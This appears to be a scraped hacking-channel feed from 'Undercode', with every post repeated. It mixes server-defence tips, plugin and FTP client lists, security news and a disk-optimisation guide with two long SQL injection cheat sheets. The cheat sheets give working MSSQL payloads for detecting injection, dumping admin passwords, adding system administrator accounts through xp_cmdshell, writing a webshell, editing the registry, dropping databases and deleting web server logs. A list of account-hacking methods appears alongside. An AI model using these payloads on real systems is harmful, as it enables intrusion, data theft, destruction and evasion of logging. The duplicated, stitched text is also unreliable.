Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦web- server attack defense solution by Undercode :
> static page
Due to the slow opening speed of dynamic pages, a large amount of data needs to be frequently called from the database. For cc attackers, even a few broilers can consume all website resources, so dynamic pages are vulnerable to cc attacks. Normally, static pages are only tens of kb, while dynamic pages may need to be called from a database of tens of MB, so the consumption is obvious. For forums, a good server is often needed to run stably, because the forum is very It is difficult to be purely static.
> Hide server ip
Using CDN acceleration can hide the real IP of the server , causing the attacker to be unable to attack the real IP, but this action can only prevent some of the more sophisticated attackers, unless you can really hide the IP.
> Prohibit proxy access
As mentioned earlier, the attacker uses a large number of proxies to attack. Setting to prohibit proxy access or limit the number of proxy connections can also play a certain protective role.
> Block attack ip
When the server is attacked by cc, there will usually be thousands of tcp connections. Open cmd and enter netstat -an. If a large number of external ips appear, it is attacked. At this time, you can use protection software to block the attacking ip or manually. This method is more common. passive.
> Use protection software
I personally think that the use of protection software is minimal and can only stop small attacks. Many software claim to be effective in identifying attack methods and intercept them. Most cc attacks can be disguised as normal users, and they can also be disguised as Baidu/google spiderβs ua. During an attack, the protection software has to analyze a large number of requests, which leads to an increase in the memory occupied by the protection software, which becomes a burden, and even the software itself crashes.
ENJOYβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦web- server attack defense solution by Undercode :
> static page
Due to the slow opening speed of dynamic pages, a large amount of data needs to be frequently called from the database. For cc attackers, even a few broilers can consume all website resources, so dynamic pages are vulnerable to cc attacks. Normally, static pages are only tens of kb, while dynamic pages may need to be called from a database of tens of MB, so the consumption is obvious. For forums, a good server is often needed to run stably, because the forum is very It is difficult to be purely static.
> Hide server ip
Using CDN acceleration can hide the real IP of the server , causing the attacker to be unable to attack the real IP, but this action can only prevent some of the more sophisticated attackers, unless you can really hide the IP.
> Prohibit proxy access
As mentioned earlier, the attacker uses a large number of proxies to attack. Setting to prohibit proxy access or limit the number of proxy connections can also play a certain protective role.
> Block attack ip
When the server is attacked by cc, there will usually be thousands of tcp connections. Open cmd and enter netstat -an. If a large number of external ips appear, it is attacked. At this time, you can use protection software to block the attacking ip or manually. This method is more common. passive.
> Use protection software
I personally think that the use of protection software is minimal and can only stop small attacks. Many software claim to be effective in identifying attack methods and intercept them. Most cc attacks can be disguised as normal users, and they can also be disguised as Baidu/google spiderβs ua. During an attack, the protection software has to analyze a large number of requests, which leads to an increase in the memory occupied by the protection software, which becomes a burden, and even the software itself crashes.
ENJOYβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦jomla best 2020 plugins list :
https://extensions.joomla.org/extension/chronoforms/
https://extensions.joomla.org/extension/zoo/
https://extensions.joomla.org/extension/jch-optimize/
https://extensions.joomla.org/extension/dj-imageslider/
https://extensions.joomla.org/extension/jce/
https://extensions.joomla.org/extension/rsform-pro/
https://extensions.joomla.org/extension/admin-tools/
https://extensions.joomla.org/extension/modules-anywhere/
> firewall :
https://extensions.joomla.org/extension/rsfirewall/
> clean cache
https://extensions.joomla.org/extension/cache-cleaner/
> page builder
https://extensions.joomla.org/extension/sp-page-builder/
you can find much more but those top jomla plugins 2020
ENJOYβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦jomla best 2020 plugins list :
https://extensions.joomla.org/extension/chronoforms/
https://extensions.joomla.org/extension/zoo/
https://extensions.joomla.org/extension/jch-optimize/
https://extensions.joomla.org/extension/dj-imageslider/
https://extensions.joomla.org/extension/jce/
https://extensions.joomla.org/extension/rsform-pro/
https://extensions.joomla.org/extension/admin-tools/
https://extensions.joomla.org/extension/modules-anywhere/
> firewall :
https://extensions.joomla.org/extension/rsfirewall/
> clean cache
https://extensions.joomla.org/extension/cache-cleaner/
> page builder
https://extensions.joomla.org/extension/sp-page-builder/
you can find much more but those top jomla plugins 2020
ENJOYβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
Joomla! Extensions Directoryβ’
ChronoForms, by Chrono Man - Joomla Extension Directory
ChronoForms is used on millions of Joomla websites, supporting Joomla since 2006, ChronoForms is an easy to use and feature rich free Joomla forms builder for Joomla 3, 4 & 5, it supports PHP 7,8,8.1,8.2,8.3
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Korean hackers are plundering credit card details from online shoppers
#News
> Hackers associated with the notorious North Korean Lazarus group are breaking into online stores and stealing customer credit card details when they visit the checkout page. These attacks, known as "webpage plundering" or "Magecart attacks," have been ongoing since May 2019 and have attacked large retailers such as international fashion chain Claire's.
> The Dutch cybersecurity company SanSec reported these attacks. It wrote that digital predatory technology has been growing since 2015, and although traditionally used by Russian and Indonesian hacking organizations, North Korean criminals supported by the government are now intercepting credit card details in online stores.
> Attacks involve gaining access to the back-end servers of an online store, usually by sending booby-trap emails to employees to obtain their passwords. Hackers sneaked into the jewelry store Claire's website in April and June. Once the website is hacked, the malicious script will be loaded on the checkout page and stolen when the credit card details are entered into the form. Once the transaction is completed, the intercepted data will be sent to a collection server controlled by the hacker organization and sold on the dark web.
> The group has established a global penetration network to profit from plundering operations. This includes hijacking and reusing legitimate websites as a disguise for criminal activities and conveying stolen assets. A model agency in Milan, an antique music store in Tehran, and a family-run bookstore in New Jersey are all part of the network.
> Sansec researchers found a link between the activity and previous North Korean hacking operations. The evidence points to Hidden Cobra, also known as the Lazarus Group, which was behind the 2014 Sony Pictures hacking and the 2016 Bangladesh bank robbery and is widely regarded as the initiator of the WannaCry malware.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Korean hackers are plundering credit card details from online shoppers
#News
> Hackers associated with the notorious North Korean Lazarus group are breaking into online stores and stealing customer credit card details when they visit the checkout page. These attacks, known as "webpage plundering" or "Magecart attacks," have been ongoing since May 2019 and have attacked large retailers such as international fashion chain Claire's.
> The Dutch cybersecurity company SanSec reported these attacks. It wrote that digital predatory technology has been growing since 2015, and although traditionally used by Russian and Indonesian hacking organizations, North Korean criminals supported by the government are now intercepting credit card details in online stores.
> Attacks involve gaining access to the back-end servers of an online store, usually by sending booby-trap emails to employees to obtain their passwords. Hackers sneaked into the jewelry store Claire's website in April and June. Once the website is hacked, the malicious script will be loaded on the checkout page and stolen when the credit card details are entered into the form. Once the transaction is completed, the intercepted data will be sent to a collection server controlled by the hacker organization and sold on the dark web.
> The group has established a global penetration network to profit from plundering operations. This includes hijacking and reusing legitimate websites as a disguise for criminal activities and conveying stolen assets. A model agency in Milan, an antique music store in Tehran, and a family-run bookstore in New Jersey are all part of the network.
> Sansec researchers found a link between the activity and previous North Korean hacking operations. The evidence points to Hidden Cobra, also known as the Lazarus Group, which was behind the 2014 Sony Pictures hacking and the 2016 Bangladesh bank robbery and is widely regarded as the initiator of the WannaCry malware.
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦VULNERABILITIES FOR BEGINERS
The vulnerability of the violent database is rare now, but there are still many sites that have this vulnerability to use. The violent database is to submit the characters to get the database file address, and we can download the database file address, which is equivalent to taking the most important website The database contains all the information of the website, and of course also the data of all users!
Injection vulnerability
This vulnerability is the SQL injection vulnerability mentioned earlier. It is the most widely used and lethality vulnerability.
Side note When
we invade a certain site, this site may be invulnerable. We can find a site on the same server as this site, and then hack into this site, using privilege escalation, sniffing and other methods to invade the site we want to invade. For example, if you share a building with me, my home is very safe, but your home is full of loopholes. Now a thief wants to invade my home. He has monitored my home (that is, scanned) and found that there is nothing to do. Using things, then the thief found that your house is in the same building as mine. Your house can easily enter. He can enter your house first, and then get the key (server permission) of the whole building through your house, so he will naturally get mine. Once you have the key, you can enter my home (website).
Social worker
If you directly Baidu social worker, the result is social work. The social worker we are talking about has nothing to do with this. The full name of social worker is social engineering. It is a technique that studies the weaknesses of human nature to attack.
ENJOYβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦VULNERABILITIES FOR BEGINERS
The vulnerability of the violent database is rare now, but there are still many sites that have this vulnerability to use. The violent database is to submit the characters to get the database file address, and we can download the database file address, which is equivalent to taking the most important website The database contains all the information of the website, and of course also the data of all users!
Injection vulnerability
This vulnerability is the SQL injection vulnerability mentioned earlier. It is the most widely used and lethality vulnerability.
Side note When
we invade a certain site, this site may be invulnerable. We can find a site on the same server as this site, and then hack into this site, using privilege escalation, sniffing and other methods to invade the site we want to invade. For example, if you share a building with me, my home is very safe, but your home is full of loopholes. Now a thief wants to invade my home. He has monitored my home (that is, scanned) and found that there is nothing to do. Using things, then the thief found that your house is in the same building as mine. Your house can easily enter. He can enter your house first, and then get the key (server permission) of the whole building through your house, so he will naturally get mine. Once you have the key, you can enter my home (website).
Social worker
If you directly Baidu social worker, the result is social work. The social worker we are talking about has nothing to do with this. The full name of social worker is social engineering. It is a technique that studies the weaknesses of human nature to attack.
ENJOYβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦few ways to hack account
1οΈβ£tx database
The tx database has been leaked, and the password is queried through the database
2οΈβ£ Intranet capture
Sometimes, the password can be intercepted by sniffing packets on the internal network. Xiaofeng has not tested qq, but it seems unlikely now.
3οΈβ£ Fishing
Phishing software, phishing websites, etc., imitate the official to trick users into entering account passwords and sending them to the server.
(Have you seen anything on the message board of other peopleβs QQ space "Why is your photo in other peopleβs space" and then a URL, you click into it is a disguised space page asking you to log in, once you log in, your space will be sent automatically Countless ads)
4οΈβ£Social workers
According to the understanding of the user, the password combination is derived.
5οΈβ£ Remote control The
remote control is online, keyboard recording.
6οΈβ£ Brute force cracking
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦few ways to hack account
1οΈβ£tx database
The tx database has been leaked, and the password is queried through the database
2οΈβ£ Intranet capture
Sometimes, the password can be intercepted by sniffing packets on the internal network. Xiaofeng has not tested qq, but it seems unlikely now.
3οΈβ£ Fishing
Phishing software, phishing websites, etc., imitate the official to trick users into entering account passwords and sending them to the server.
(Have you seen anything on the message board of other peopleβs QQ space "Why is your photo in other peopleβs space" and then a URL, you click into it is a disguised space page asking you to log in, once you log in, your space will be sent automatically Countless ads)
4οΈβ£Social workers
According to the understanding of the user, the password combination is derived.
5οΈβ£ Remote control The
remote control is online, keyboard recording.
6οΈβ£ Brute force cracking
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST FTP CLIENTS SERVICES :
http://winscp.net/eng/index.php
https://cyberduck.io/
https://panic.com/transmit/
http://www.coffeecup.com/free-ftp/
https://sourceforge.net/projects/filezilla/
https://www.ipswitch.com/secure-information-and-file-transfer/wsftp-client
https://www.globalscape.com/cuteftp
ENJOYβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST FTP CLIENTS SERVICES :
http://winscp.net/eng/index.php
https://cyberduck.io/
https://panic.com/transmit/
http://www.coffeecup.com/free-ftp/
https://sourceforge.net/projects/filezilla/
https://www.ipswitch.com/secure-information-and-file-transfer/wsftp-client
https://www.globalscape.com/cuteftp
ENJOYβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
WinSCP - Free SFTP and FTP client
WinSCP is a popular free file manager for Windows supporting SFTP, FTP, FTPS, SCP, S3, WebDAV and local-to-local file transfers. A powerful tool to enhance your productivity with a user-friendly interface and automation options like .NET assembly.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Tellyouthepass ransomware attacked the intranet with the Eternal Blue attack module, and companies have been victimized
> the Tellyouthepass ransomware variant was active during the routine risk file investigation. The attacker uses the compression tool to package the exe, and integrates the ms16-032 kernel privilege escalation vulnerability exploit module and the Eternal Blue intranet spread module into the ransomware attack package to achieve intranet worm-like virus transmission. If the company fails to patch the loopholes in time, it may cause serious losses.
> As we all know, the WannaCry virus incident is a network disaster created by ransomware using Eternal Blue loopholes to worm-like spread. Fortunately, the Eternal Blue vulnerability has been patched for more than 3 years after all, and only a few Windows systems have not repaired the vulnerability.
> Check the Bitcoin wallet address used by Tellyouthepass ransomware for transactions, and found that there have been many transactions recently, and the current balance of the wallet is 0.69 Bitcoin. Because the ransomware uses RSA+AES to encrypt files, the files cannot be decrypted temporarily after being encrypted by the virus.
> At the same time, ransomware with the ability to attack worms can easily spread widely on weak corporate intranets. We remind government and corporate organizations to be highly vigilant.
#News
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Tellyouthepass ransomware attacked the intranet with the Eternal Blue attack module, and companies have been victimized
> the Tellyouthepass ransomware variant was active during the routine risk file investigation. The attacker uses the compression tool to package the exe, and integrates the ms16-032 kernel privilege escalation vulnerability exploit module and the Eternal Blue intranet spread module into the ransomware attack package to achieve intranet worm-like virus transmission. If the company fails to patch the loopholes in time, it may cause serious losses.
> As we all know, the WannaCry virus incident is a network disaster created by ransomware using Eternal Blue loopholes to worm-like spread. Fortunately, the Eternal Blue vulnerability has been patched for more than 3 years after all, and only a few Windows systems have not repaired the vulnerability.
> Check the Bitcoin wallet address used by Tellyouthepass ransomware for transactions, and found that there have been many transactions recently, and the current balance of the wallet is 0.69 Bitcoin. Because the ransomware uses RSA+AES to encrypt files, the files cannot be decrypted temporarily after being encrypted by the virus.
> At the same time, ransomware with the ability to attack worms can easily spread widely on weak corporate intranets. We remind government and corporate organizations to be highly vigilant.
#News
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Steps to optimize hard disk in win10:
1. First click to select settings.
2. Search for the control panel in the setting interface and open the control panel.
3. In the control panel, select the large icon or small icon as the viewing method, and then select the management tool.
4. Select defragment and optimize drive in the management tool.
5. Then select the disk that needs to be organized and optimized, and select optimization.
6. Of course, you can also enable the following optimization plan here, just click to enable it.
7. Then select the optimized frequency and the driver that needs to be optimized.
8. Then select Run as planned, and finally set up automatic optimization.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Steps to optimize hard disk in win10:
1. First click to select settings.
2. Search for the control panel in the setting interface and open the control panel.
3. In the control panel, select the large icon or small icon as the viewing method, and then select the management tool.
4. Select defragment and optimize drive in the management tool.
5. Then select the disk that needs to be organized and optimized, and select optimization.
6. Of course, you can also enable the following optimization plan here, just click to enable it.
7. Then select the optimized frequency and the driver that needs to be optimized.
8. Then select Run as planned, and finally set up automatic optimization.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SQL manual injection statement & SQL manual injection Daquan
Look at the following
1. Determine whether there is injection
; and 1=1
; and 1=2
2. Preliminarily determine whether it is mssql
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4. The injected parameters are the characters'and
[query condition] and''='
5. There is no filter parameter'and
[query condition] and'%25 when searching '='
6. Guess the database
; and (select Count(*) from [database name])>0
7. Guess the field
; and (select Count(field name) from database name)>0
8. Guess the record length in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ascii value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name )>0
(2) Guess the ascii value of the field (mssql)
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test permission structure (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1= (select IS_MEMBER('db_owner')); -
11.Add mssql and system accounts
; exec master.dbo.sp_addlogin username; -
;exec master.dbo.sp_password null,username,password; -
;exec master. dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell'net user username password /add';--
;exec master.dbo.xp_cmdshell'net localgroup administrators username /add';--
12.(1) Traverse directories
; create table dirs(paths varchar (100), id int)
;insert dirs exec master.dbo.xp_dirtree'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('δΈζ₯The obtained paths'))>)
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); -
;insert temp exec master .dbo.xp_availablemedia; - get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs'c:\'; - get a list of subdirectories
; insert into temp(id,num1) exec master.dbo. xp_dirtree'c:\'; - get the directory tree structure of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell'type c:\web\index.asp';-- View the contents of the file
13. The stored procedure
xp_regenumvalues ββin mssql registry root key, subkey
; exec xp_regenumvalues' HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values ββin multiple record sets
xp_regread root key, subkey, key value name
; exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion' ,'CommonFilesDir' returns the value of the
specified key xp_regwrite root key, subkey, value name, value type, value
There are two types of value types. REG_SZ represents character type, and REG_DWORD represents integer type
; exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows \CurrentVersion','TestvalueName','reg_sz','hello' write to the registry
xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' delete a value
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' delete key, including all values ββunder this key
14. mssql backup creation webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ( '');
backup database model to disk='c:\l.asp';
π¦SQL manual injection statement & SQL manual injection Daquan
Look at the following
1. Determine whether there is injection
; and 1=1
; and 1=2
2. Preliminarily determine whether it is mssql
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4. The injected parameters are the characters'and
[query condition] and''='
5. There is no filter parameter'and
[query condition] and'%25 when searching '='
6. Guess the database
; and (select Count(*) from [database name])>0
7. Guess the field
; and (select Count(field name) from database name)>0
8. Guess the record length in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ascii value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name )>0
(2) Guess the ascii value of the field (mssql)
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test permission structure (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1= (select IS_MEMBER('db_owner')); -
11.Add mssql and system accounts
; exec master.dbo.sp_addlogin username; -
;exec master.dbo.sp_password null,username,password; -
;exec master. dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell'net user username password /add';--
;exec master.dbo.xp_cmdshell'net localgroup administrators username /add';--
12.(1) Traverse directories
; create table dirs(paths varchar (100), id int)
;insert dirs exec master.dbo.xp_dirtree'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('δΈζ₯The obtained paths'))>)
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); -
;insert temp exec master .dbo.xp_availablemedia; - get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs'c:\'; - get a list of subdirectories
; insert into temp(id,num1) exec master.dbo. xp_dirtree'c:\'; - get the directory tree structure of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell'type c:\web\index.asp';-- View the contents of the file
13. The stored procedure
xp_regenumvalues ββin mssql registry root key, subkey
; exec xp_regenumvalues' HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values ββin multiple record sets
xp_regread root key, subkey, key value name
; exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion' ,'CommonFilesDir' returns the value of the
specified key xp_regwrite root key, subkey, value name, value type, value
There are two types of value types. REG_SZ represents character type, and REG_DWORD represents integer type
; exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows \CurrentVersion','TestvalueName','reg_sz','hello' write to the registry
xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' delete a value
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' delete key, including all values ββunder this key
14. mssql backup creation webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ( '');
backup database model to disk='c:\l.asp';
15.mssql built-in function
; and (select @@version)>0 to obtain the version number of Windows
; and user_name()='dbo' to determine the current Is the system's connected user sa
; and (select user_name())>0 explodes the current system's connected user
; and (select db_name())>0 gets the currently connected database
16. Simple webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ('');
backup database model to disk='g:\wwwtest\l.asp'; When
requesting, use it like this:
http://ip/l.asp ?c=dir
ENJOYβ€οΈππ»
WRITTEN BY
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
; and (select @@version)>0 to obtain the version number of Windows
; and user_name()='dbo' to determine the current Is the system's connected user sa
; and (select user_name())>0 explodes the current system's connected user
; and (select db_name())>0 gets the currently connected database
16. Simple webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ('');
backup database model to disk='g:\wwwtest\l.asp'; When
requesting, use it like this:
http://ip/l.asp ?c=dir
ENJOYβ€οΈππ»
WRITTEN BY
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACKING WEBSITE EXAMPLE BY UNDERCODE :
#expertsTips
βββSplit
SQL Server to
determine whether injection is possible:
http://www.exehack.net/article.asp?id=6
http://www.exehack.net/article.asp?id=6β²
http:// www.exehack.net/article.asp?id=6 and 1=1
http://www.exehack.net/article.asp?id=6 and 1=2
http://www.exehack.net/article. asp?action=value' and 1=1
http://www.exehack.net/article.asp?action=value' and 1=2
searchpoints%' and 1=1
searchpoints%' and 1=2
Determine the database type:
http://www.exehack.net/article.asp?id=6 and user>0
http://www.exehack.net/article.asp?id=6 and (select count(*) from sysobjects)>0
Query the current user data information:
article.asp?id=6 having 1=1β
columns in the current table:
article.asp?id=6 group by admin.username having 1=1β
article.asp?id=6 group by admin.username,admin.password having 1=1β
any table and column:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id('admin'),N) from sysobjects)>1
Storm database data:
and (select top 1 password from admin where id=N)>1
Modify the data in the database:
;update admin set password='oooooo' where username='xxx'
Add data in the database:
;insert into admin values ββ(xxx, oooooo)βDelete
database:
;drop database webdata to
obtain the current database user name: and user>0 to
obtain the current database name: and db_name()>0 to
obtain the database version: and (select @@version)>0 to
determine whether multiple sentence queries are supported : ;Declare @a intβ
Determine whether to support sub-queries: and (select count(1) from [sysobjects])>=0
Extended stored procedures of the database: exec master..xp_cmdshell to
view the server C drive directory: ;exec_master..xp_cmdshell'dir c:\' to
determine Does the extended stored procedure exist: and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' to
restore the extended stored procedure:;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'
delete the extended stored procedure: ;exec sp_dropextendedproc'xp_cmdshell'
provides some functions in MSSQL2000 for accessing OLE objects indirectly to obtain permissions:
;declare @s int
;exec sp_oacreat'wscript.shell',@s
;exec master..spoamethod @s,'run' ,null,'cmd.exe/c dir c:\' to
determine whether the current database user name has higher permissions:
and 1=(select is_srvrolemember('sysadmin'))
and 1=(select is_srvrolemember('serveradmin'))
and 1=(select is_srvrolemember('setupadmin'))
and 1=(select is_srvrolemember('securityadmin'))
and 1=(select is_srvrolemember('diskadmin'))
and 1=(select is_srvrolemember('bulkadmin'))
Determine whether the current database user name is DB_OWNER:
and 1=(select is_member('db_owner'))
stores all database information in the SQLSERVER database system in the master.dbo.sysdatabases table of SQLSERVER. You only need PUBLIC permissions to perform SELECT operations on this table:
and (select top 1 name from master. dbo.sysdatabase order by dbid)>0
and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0
delete log records:
;exec master.dbo.xp_cmdshell'del c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt' to
replace the log record:
; exec master.dbo.xp_cmdshell 'copy c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070404.log c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070606.log> c: \ temp.txt'
Get Path WEB:
; declare @shell int
;exec master..sp_oamethod'wscript.shell',@shell out
;exec master..sp_oamethod @shell,'run',null,'cmd.exe/c dir /sd:/index.asp >c :/log.txt
Use XP_CMDSHELL to search:
;exec master..xp_cmdshell'dir /sd:/index.asp'
command to display server website configuration information:
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc /1/root
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root
Use XP_REGREAD to read with PUBLIC permission:
;exec master.dbo.xp_regread
π¦HACKING WEBSITE EXAMPLE BY UNDERCODE :
#expertsTips
βββSplit
SQL Server to
determine whether injection is possible:
http://www.exehack.net/article.asp?id=6
http://www.exehack.net/article.asp?id=6β²
http:// www.exehack.net/article.asp?id=6 and 1=1
http://www.exehack.net/article.asp?id=6 and 1=2
http://www.exehack.net/article. asp?action=value' and 1=1
http://www.exehack.net/article.asp?action=value' and 1=2
searchpoints%' and 1=1
searchpoints%' and 1=2
Determine the database type:
http://www.exehack.net/article.asp?id=6 and user>0
http://www.exehack.net/article.asp?id=6 and (select count(*) from sysobjects)>0
Query the current user data information:
article.asp?id=6 having 1=1β
columns in the current table:
article.asp?id=6 group by admin.username having 1=1β
article.asp?id=6 group by admin.username,admin.password having 1=1β
any table and column:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id('admin'),N) from sysobjects)>1
Storm database data:
and (select top 1 password from admin where id=N)>1
Modify the data in the database:
;update admin set password='oooooo' where username='xxx'
Add data in the database:
;insert into admin values ββ(xxx, oooooo)βDelete
database:
;drop database webdata to
obtain the current database user name: and user>0 to
obtain the current database name: and db_name()>0 to
obtain the database version: and (select @@version)>0 to
determine whether multiple sentence queries are supported : ;Declare @a intβ
Determine whether to support sub-queries: and (select count(1) from [sysobjects])>=0
Extended stored procedures of the database: exec master..xp_cmdshell to
view the server C drive directory: ;exec_master..xp_cmdshell'dir c:\' to
determine Does the extended stored procedure exist: and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' to
restore the extended stored procedure:;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'
delete the extended stored procedure: ;exec sp_dropextendedproc'xp_cmdshell'
provides some functions in MSSQL2000 for accessing OLE objects indirectly to obtain permissions:
;declare @s int
;exec sp_oacreat'wscript.shell',@s
;exec master..spoamethod @s,'run' ,null,'cmd.exe/c dir c:\' to
determine whether the current database user name has higher permissions:
and 1=(select is_srvrolemember('sysadmin'))
and 1=(select is_srvrolemember('serveradmin'))
and 1=(select is_srvrolemember('setupadmin'))
and 1=(select is_srvrolemember('securityadmin'))
and 1=(select is_srvrolemember('diskadmin'))
and 1=(select is_srvrolemember('bulkadmin'))
Determine whether the current database user name is DB_OWNER:
and 1=(select is_member('db_owner'))
stores all database information in the SQLSERVER database system in the master.dbo.sysdatabases table of SQLSERVER. You only need PUBLIC permissions to perform SELECT operations on this table:
and (select top 1 name from master. dbo.sysdatabase order by dbid)>0
and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0
delete log records:
;exec master.dbo.xp_cmdshell'del c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt' to
replace the log record:
; exec master.dbo.xp_cmdshell 'copy c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070404.log c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070606.log> c: \ temp.txt'
Get Path WEB:
; declare @shell int
;exec master..sp_oamethod'wscript.shell',@shell out
;exec master..sp_oamethod @shell,'run',null,'cmd.exe/c dir /sd:/index.asp >c :/log.txt
Use XP_CMDSHELL to search:
;exec master..xp_cmdshell'dir /sd:/index.asp'
command to display server website configuration information:
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc /1/root
